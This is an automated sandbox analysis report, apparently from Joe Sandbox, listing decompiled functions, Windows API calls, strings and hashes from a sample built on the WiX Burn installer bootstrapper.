SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B7BD

Part of subcall function 0051394F: GetProcessHeap.KERNEL32(?,?,?,00512274,?,00000001,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513960
Part of subcall function 0051394F: RtlAllocateHeap.NTDLL(00000000,?,00512274,?,00000001,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0051B906

Strings

Failed to read section info, unsupported version: %08x, xrefs: 0051B9F5
Failed to find Burn section., xrefs: 0051BB32
Failed to find valid NT image header in buffer., xrefs: 0051BBD0
section.cpp, xrefs: 0051B523, 0051B577, 0051B5C5, 0051B628, 0051B677, 0051B6EE, 0051B73D, 0051B78C, 0051B7E1, 0051B898, 0051B8D8, 0051B92A, 0051B98F, 0051B9B9, 0051B9E0, 0051BAC7, 0051BB07, 0051BB26, 0051BB63, 0051BBA1, 0051BBC4, 0051BBDF
Failed to seek past optional headers., xrefs: 0051B7EB
Failed to seek to section info., xrefs: 0051B6F8, 0051B934
Failed to read section info., xrefs: 0051B999
Failed to read complete section info., xrefs: 0051B9C5
(, xrefs: 0051B81D
Failed to read NT header., xrefs: 0051B681
PE Header from file didn't match PE Header in memory., xrefs: 0051BB11
Failed to read image section header, index: %u, xrefs: 0051BBAC
Failed to find valid DOS image header in buffer., xrefs: 0051BBEB
Failed to read signature offset., xrefs: 0051B747
aDQH, xrefs: 0051B4A2, 0051B598, 0051B5EB, 0051B4AC, 0051B59B
Failed to open handle to user process path., xrefs: 0051B52D
Failed to seek to start of file., xrefs: 0051B581
Failed to get total size of bundle., xrefs: 0051BA23
Failed to read DOS header., xrefs: 0051B5CF
PE, xrefs: 0051B698
Failed to read complete image section header, index: %u, xrefs: 0051BB75
Failed to read section info, data to short: %u, xrefs: 0051B8AA
Failed to seek to NT header., xrefs: 0051B632
4, xrefs: 0051B884
Failed to allocate memory for container sizes., xrefs: 0051BAD3
Failed to allocate buffer for section info., xrefs: 0051B8E4
.wix, xrefs: 0051B830
Failed to read signature size., xrefs: 0051B796
burn, xrefs: 0051B838

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$aDQH$burn$section.cpp
API String ID: 3411815225-4039798090
Opcode ID: 728a2d2edf870aa2015e559c6fdb91df423af85685ccbd9c21d4cbb37ac1593a
Instruction ID: b3e8b6e7d06104cb9e83844db94d66a852506dceb50f4fa295af5379cff0e6e4
Opcode Fuzzy Hash: 728a2d2edf870aa2015e559c6fdb91df423af85685ccbd9c21d4cbb37ac1593a
Instruction Fuzzy Hash: 0312E776941235ABFB349B548C5AFEA7EA8BF44711F0101A5FD04BB281E7709E84CBE0

Function 00530D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,005308BC,?,?), ref: 00530D25
GetLastError.KERNEL32(?,?,?,?,005308BC,?,?), ref: 00530D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,005308BC,?,?), ref: 00530D74
GetLastError.KERNEL32(?,?,?,?,005308BC,?,?), ref: 00530D7F
ResetEvent.KERNEL32(?,?,?,?,?,005308BC,?,?), ref: 00530DB7
GetLastError.KERNEL32(?,?,?,?,005308BC,?,?), ref: 00530DC1

Strings

Failed to create file: %ls, xrefs: 00531001
cabextract.cpp, xrefs: 00530D53, 00530DA3, 00530DE5, 00530E11, 00530E94, 00530EDC, 00530F21, 00530F89, 00530FF4, 00531045, 0053108A, 005310CE
Invalid operation for this state., xrefs: 00530E1D
Failed to set end of file., xrefs: 00531094
Failed to copy stream name: %ls, xrefs: 00530E50
Failed to wait for begin operation event., xrefs: 00530DAD, 00530EE6
Failed to allocate buffer for stream., xrefs: 00530F93
Failed to set file pointer to beginning of file., xrefs: 005310D8
Failed to set file pointer to end of file., xrefs: 0053104F
Failed to reset begin operation event., xrefs: 00530DEF, 00530F2B
Failed to set operation complete event., xrefs: 00530D5D, 00530E9E

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: f554d393e4f5f488bc7d30fa69c6d956137ae4ca99c55b25ef8c1b8c67ecfc21
Instruction ID: 8c26598848c5cac66afadd83e63bec9ab20f4f5cda2071439a6eba69acc96cde
Opcode Fuzzy Hash: f554d393e4f5f488bc7d30fa69c6d956137ae4ca99c55b25ef8c1b8c67ecfc21
Instruction Fuzzy Hash: 2F91033BA81B32B7E73516A54D2DB6A3E54BF00B21F224611BE10BF2D0D751DC40AAE5

Function 00515195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00515217

Part of subcall function 005504F8: InitializeCriticalSection.KERNEL32(0057B5FC,?,00515223,00000000,?,?,?,?,?,?), ref: 0055050F

Part of subcall function 0051120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0051523F,00000000,?), ref: 00511248
Part of subcall function 0051120A: GetLastError.KERNEL32(?,?,?,0051523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00511252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00515285

Part of subcall function 00550E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00550E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00515317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00515321
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0051558E

Strings

Failed to initialize Regutil., xrefs: 005152C9
Failed to initialize COM., xrefs: 00515291
user.cpp, xrefs: 00515345
Failed to run embedded mode., xrefs: 00515444
Failed to get OS info., xrefs: 0051534F
Failed to run per-user mode., xrefs: 00515494
3.11.1.2318, xrefs: 00515384
Failed to initialize Wiutil., xrefs: 005152E1
Failed to run per-machine mode., xrefs: 0051546C
Failed to run RunOnce mode., xrefs: 0051541C
Failed to initialize Cryputil., xrefs: 005152A6
Failed to initialize XML util., xrefs: 005152F9
Failed to parse command line., xrefs: 00515245
Failed to initialize core., xrefs: 005153C3
Invalid run mode., xrefs: 005153F9
Failed to initialize user state., xrefs: 0051526C
Failed to run untrusted mode., xrefs: 005154B6

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$user.cpp
API String ID: 3262001429-510904028
Opcode ID: d9482415a7c05541c76f0a80c1aba902fbe5c0c76829a60c92cb3e1f93e58741
Instruction ID: 653d5ae12008cb1ef6e4041d5021797beb6be07e70014257ae0632ff42b7214e
Opcode Fuzzy Hash: d9482415a7c05541c76f0a80c1aba902fbe5c0c76829a60c92cb3e1f93e58741
Instruction Fuzzy Hash: 0AB19572D40A2ADBFB319A64CC5ABED7E75BFC4311F010596E908A6241E7709EC4DF90

Function 0052752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to load catalog files., xrefs: 0052780F
Failed to get source process folder from path., xrefs: 00527725
WixBundleOriginalSource, xrefs: 00527759
Failed to parse command line., xrefs: 00527667
Failed to extract bootstrapper application payloads., xrefs: 005277EF
WixBundleUILevel, xrefs: 005276D6, 005276E7
Failed to open manifest stream., xrefs: 005275AB
Failed to open attached UX container., xrefs: 0052758E
Failed to set source process folder variable., xrefs: 00527745
Failed to set source process path variable., xrefs: 00527709
Failed to get unique temporary folder for bootstrapper application., xrefs: 005277CE
WixBundleSourceProcessFolder, xrefs: 00527734
Failed to overwrite the %ls built-in variable., xrefs: 005276BB
Failed to initialize internal cache functionality., xrefs: 0052779F
WixBundleSourceProcessPath, xrefs: 005276F8
Failed to get manifest stream from container., xrefs: 005275CC
WixBundleElevated, xrefs: 005276A5, 005276B6
Failed to initialize variables., xrefs: 00527571
Failed to set original source variable., xrefs: 0052776A
Failed to load manifest., xrefs: 005275E8

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
API String ID: 32694325-1564579409
Opcode ID: 4eca02d356695ce6a5d01a24365e95d6e322f48a71d4ea26dc71a62e36a3ebbe
Instruction ID: 14a846afc3134e0f1abbe4bbe5b6a6d86132e0d0d24e0873f42b8872311aaaa1
Opcode Fuzzy Hash: 4eca02d356695ce6a5d01a24365e95d6e322f48a71d4ea26dc71a62e36a3ebbe
Instruction Fuzzy Hash: 1BA1A572E4462EBBDB12DAA4DC99EEEBF6CBF09700F040566F515E7180D730A944DBA0

Function 0051762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(0052756B,005153BD,00000000,00515445), ref: 0051764C

Strings

Date, xrefs: 00517770
WixBundleExecutePackageCacheFolder, xrefs: 00517D98
#, xrefs: 005176CB
Failed to add built-in variable: %ls., xrefs: 00517F19
WixBundleTag, xrefs: 00517EAE
WixBundleUILevel, xrefs: 00517EBE
$, xrefs: 00517D49
WixBundleAction, xrefs: 00517D76
InstallerVersion, xrefs: 00517833
WixBundleProviderKey, xrefs: 00517E7E
WixBundleSourceProcessFolder, xrefs: 00517E9E
', xrefs: 005178EB
WixBundleSourceProcessPath, xrefs: 00517E8E
InstallerName, xrefs: 00517812
WixBundleExecutePackageAction, xrefs: 00517DF8
WixBundleElevated, xrefs: 00517E46
WixBundleVersion, xrefs: 00517ECE
LogonUser, xrefs: 00517882
0, xrefs: 00517663
WixBundleForcedRestartPackage, xrefs: 00517E14
WixBundleActiveParent, xrefs: 00517E62
WixBundleInstalled, xrefs: 00517E2A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
API String ID: 32694325-3635313340
Opcode ID: 9b4c8d861e835513ab57df36080905f2383eb496a302d4496db9d10f5b66e07c
Instruction ID: 613078c8cc3ec0dd384801ef010da9b3c479628b57c17eae6c6d969a23e25029
Opcode Fuzzy Hash: 9b4c8d861e835513ab57df36080905f2383eb496a302d4496db9d10f5b66e07c
Instruction Fuzzy Hash: 6E3246B0C117299FEB658F5AC8987CDFEF4BB49305F9085EE960CA6210D7B01A88CF45

Function 005282BA Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00515489), ref: 00528310

Part of subcall function 00550879: OpenProcessToken.ADVAPI32(?,00000008,?,005153BD,00000000,?,?,?,?,?,?,?,0052769D,00000000), ref: 00550897
Part of subcall function 00550879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0052769D,00000000), ref: 005508A1
Part of subcall function 00550879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0052769D,00000000), ref: 0055092B

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00528336
GetLastError.KERNEL32 ref: 00528340
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 005283BD
GetLastError.KERNEL32 ref: 005283C7
UuidCreate.RPCRT4(?), ref: 00528406

Strings

cache.cpp, xrefs: 00528364, 005283EB, 0052843C
Failed to concat Temp directory on windows path for working folder., xrefs: 005283AD
Temp\, xrefs: 00528395
Failed to convert working folder guid into string., xrefs: 00528446
Failed to copy working folder path., xrefs: 0052848B
%ls%ls\, xrefs: 00528458
Failed to get temp path for working folder., xrefs: 005283F5
4#v, xrefs: 005283BD
Failed to ensure windows path for working folder ended in backslash., xrefs: 0052838B
Failed to get windows path for working folder., xrefs: 0052836E
Failed to create working folder guid., xrefs: 00528413
Failed to append bundle id on to temp path for working folder., xrefs: 00528470

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
String ID: 4#v$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 266130487-3587817078
Opcode ID: 17aee214a61d57dc3d270b7ad0209eb6f07a0251187d56bd932da09aae05a7d4
Instruction ID: be99b74d42642f39b3850f2649ac0793c0a8af1cff5dc5668165e1a2e6674649
Opcode Fuzzy Hash: 17aee214a61d57dc3d270b7ad0209eb6f07a0251187d56bd932da09aae05a7d4
Instruction Fuzzy Hash: D041F732A42736B7DB20A6E0AC4DFAB7F6CBF51B11F104561BA08F71C0EA749D4496E1

Function 005310FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 0053111D
CoUninitialize.COMBASE ref: 00531398

Strings

Failed to initialize cabinet.dll., xrefs: 0053119F
cabextract.cpp, xrefs: 00531193, 005312BA, 00531307, 00531346, 00531372
Invalid operation for this state., xrefs: 0053137C
Failed to initialize COM., xrefs: 00531129
Failed to wait for begin operation event., xrefs: 00531311
Failed to extract all files from container, erf: %d:%X:%d, xrefs: 00531279
Failed to reset begin operation event., xrefs: 00531350
Failed to set operation complete event., xrefs: 005312C4
<the>.cab, xrefs: 005311BD

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: InitializeUninitialize
String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3442037557-1168358783
Opcode ID: e703012c458ba1311d350748ee0506b2e4cec79af70838c5237d5622f9ba7451
Instruction ID: 5337653cb65f7f2f7eb85b98ac89207479465c3769f5635157575556d583f0bb
Opcode Fuzzy Hash: e703012c458ba1311d350748ee0506b2e4cec79af70838c5237d5622f9ba7451
Instruction Fuzzy Hash: 8A514A3BA40A62E7DF2057B68C19EAB7F54BB41760F220B25FD01FB2D1DA158C00D6DA

Function 005142D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00515266,?,?,00000000,?,?), ref: 00514303
InitializeCriticalSection.KERNEL32(000000D0,?,?,00515266,?,?,00000000,?,?), ref: 0051430C
lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00515266,?,?,00000000,?,?), ref: 00514352
lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00515266,?,?,00000000,?,?), ref: 0051435C
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00515266,?,?,00000000,?,?), ref: 00514370
lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00515266,?,?,00000000,?,?), ref: 00514380
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00515266,?,?,00000000,?,?), ref: 005143D0
lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00515266,?,?,00000000,?,?), ref: 005143DA
CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00515266,?,?,00000000,?,?), ref: 005143EE
lstrlenW.KERNEL32(burn.filehandle.self,?,?,00515266,?,?,00000000,?,?), ref: 005143FE

Strings

Failed to parse file handle: '%ls', xrefs: 00514482
burn.filehandle.attached, xrefs: 0051434D, 00514355, 0051435A, 0051435B, 0051437B, 0051449F
Missing required parameter for switch: %ls, xrefs: 005144A4
user.cpp, xrefs: 00514495, 005144C1
Failed to initialize user section., xrefs: 00514467
burn.filehandle.self, xrefs: 005143CB, 005143D3, 005143D8, 005143D9, 005143F9, 005144CB

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: lstrlen$CompareCriticalInitializeSectionString
String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
API String ID: 3039292287-3209860532
Opcode ID: e4093072ff475006361c7be20b6e5ccc6b3fd7edff390dfbb4dc8da50703c2df
Instruction ID: 385a5a76b6b40ab1ff455e83d630bf5f649fcf6d1c9ccbeff0719e5037c89479
Opcode Fuzzy Hash: e4093072ff475006361c7be20b6e5ccc6b3fd7edff390dfbb4dc8da50703c2df
Instruction Fuzzy Hash: 8851D871A00216BFEB20DB68CC5AF9A7F6CFF14761F100116FA14E7290D7B1A994CBA0

Function 0052E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32(?,?), ref: 0052E7FF
RegisterClassW.USER32(?), ref: 0052E82B
GetLastError.KERNEL32 ref: 0052E836
CreateWindowExW.USER32(00000080,00569E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0052E89D
GetLastError.KERNEL32 ref: 0052E8A7
UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0052E945

Strings

WixBurnMessageWindow, xrefs: 0052E824, 0052E940
Failed to register window., xrefs: 0052E864
Unexpected return value from message pump., xrefs: 0052E930
Failed to create window., xrefs: 0052E8D5
uithread.cpp, xrefs: 0052E85A, 0052E8CB

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
API String ID: 213125376-288575659
Opcode ID: 2aec918d6cb9c898bbc22d618f605f84cebc1c4db506977fa8807e326b0baade
Instruction ID: 7fc8490e7367bf28e51ae73b22be2a6b3e1d449d8b05cc1ad11fc57e5f47e273
Opcode Fuzzy Hash: 2aec918d6cb9c898bbc22d618f605f84cebc1c4db506977fa8807e326b0baade
Instruction Fuzzy Hash: A341B672900225EBDB208BA5EC49ADEBFB8FF05751F114126F905BB190D7319D44DBE0

Function 0051C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0051C47F,00515405,?,?,00515445), ref: 0051C2D6
GetLastError.KERNEL32(?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 0051C2E7
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0051C47F,00515405,?,?,00515445,00515445,00000000,?), ref: 0051C336
GetCurrentProcess.KERNEL32(000000FF,00000000,?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 0051C33C
DuplicateHandle.KERNELBASE(00000000,?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 0051C33F
GetLastError.KERNEL32(?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 0051C349
SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 0051C39B
GetLastError.KERNEL32(?,0051C47F,00515405,?,?,00515445,00515445,00000000,?,00000000), ref: 0051C3A5

Strings

feclient.dll, xrefs: 0051C398
Failed to open container., xrefs: 0051C3F1
crypt32.dll, xrefs: 0051C397
Failed to move file pointer to container offset., xrefs: 0051C3D3
container.cpp, xrefs: 0051C30B, 0051C36D, 0051C3C9
Failed to duplicate handle to container: %ls, xrefs: 0051C37A
Failed to open file: %ls, xrefs: 0051C318

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

